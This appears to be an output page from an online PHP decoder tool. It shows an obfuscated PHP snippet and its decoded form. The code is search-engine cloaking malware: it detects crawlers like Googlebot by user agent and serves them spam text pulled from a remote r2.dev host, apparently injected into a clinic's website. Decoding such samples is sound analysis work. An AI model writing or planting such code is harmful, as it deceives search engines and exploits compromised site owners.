Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
goto wt9fw; c6j30: if (is_bot()) { $message = file_get_contents("\150\x74\x74\160\x73\x3a..
Decoded Output download
<? goto wt9fw; c6j30: if (is_bot()) { $message = file_get_contents("https://pub-910cb700ea7d448288ff507bab9214f6.r2.dev/thelasertreatmentclinic.com.txt"); echo $message; } goto bFhv_; wt9fw: function is_bot() { $user_agent = $_SERVER["HTTP_USER_AGENT"]; $bots = array("Googlebot", "TelegramBot", "bingbot", "Google-Site-Verification", "Google-InspectionTool"); foreach ($bots as $bot) { if (stripos($user_agent, $bot) !== false) { return true; } } return false; } goto c6j30; bFhv_: ?>
Did this file decode correctly?
Original Code
goto wt9fw; c6j30: if (is_bot()) { $message = file_get_contents("\150\x74\x74\160\x73\x3a\57\57\x70\165\142\55\x39\x31\x30\x63\x62\67\60\60\x65\141\x37\x64\x34\64\70\62\x38\x38\146\x66\x35\60\x37\142\x61\x62\71\62\x31\x34\x66\x36\56\x72\62\x2e\144\x65\x76\x2f\164\x68\x65\154\141\x73\145\162\164\162\x65\141\164\x6d\145\x6e\x74\143\x6c\x69\156\151\143\x2e\143\157\x6d\x2e\164\170\164"); echo $message; } goto bFhv_; wt9fw: function is_bot() { $user_agent = $_SERVER["\x48\124\124\x50\x5f\x55\x53\x45\x52\137\x41\x47\x45\116\x54"]; $bots = array("\x47\157\157\x67\154\x65\x62\x6f\x74", "\124\x65\x6c\x65\147\162\x61\155\x42\x6f\x74", "\142\x69\x6e\147\x62\x6f\x74", "\107\x6f\157\x67\x6c\145\55\123\151\164\x65\55\x56\x65\x72\151\x66\x69\143\x61\x74\151\157\x6e", "\x47\157\157\x67\154\145\55\111\x6e\163\x70\x65\x63\x74\151\x6f\x6e\124\x6f\157\x6c"); foreach ($bots as $bot) { if (stripos($user_agent, $bot) !== false) { return true; } } return false; } goto c6j30; bFhv_:
Function Calls
None |
Stats
MD5 | 011e892ae278e59d8578eb7788ee3e0e |
Eval Count | 0 |
Decode Time | 37 ms |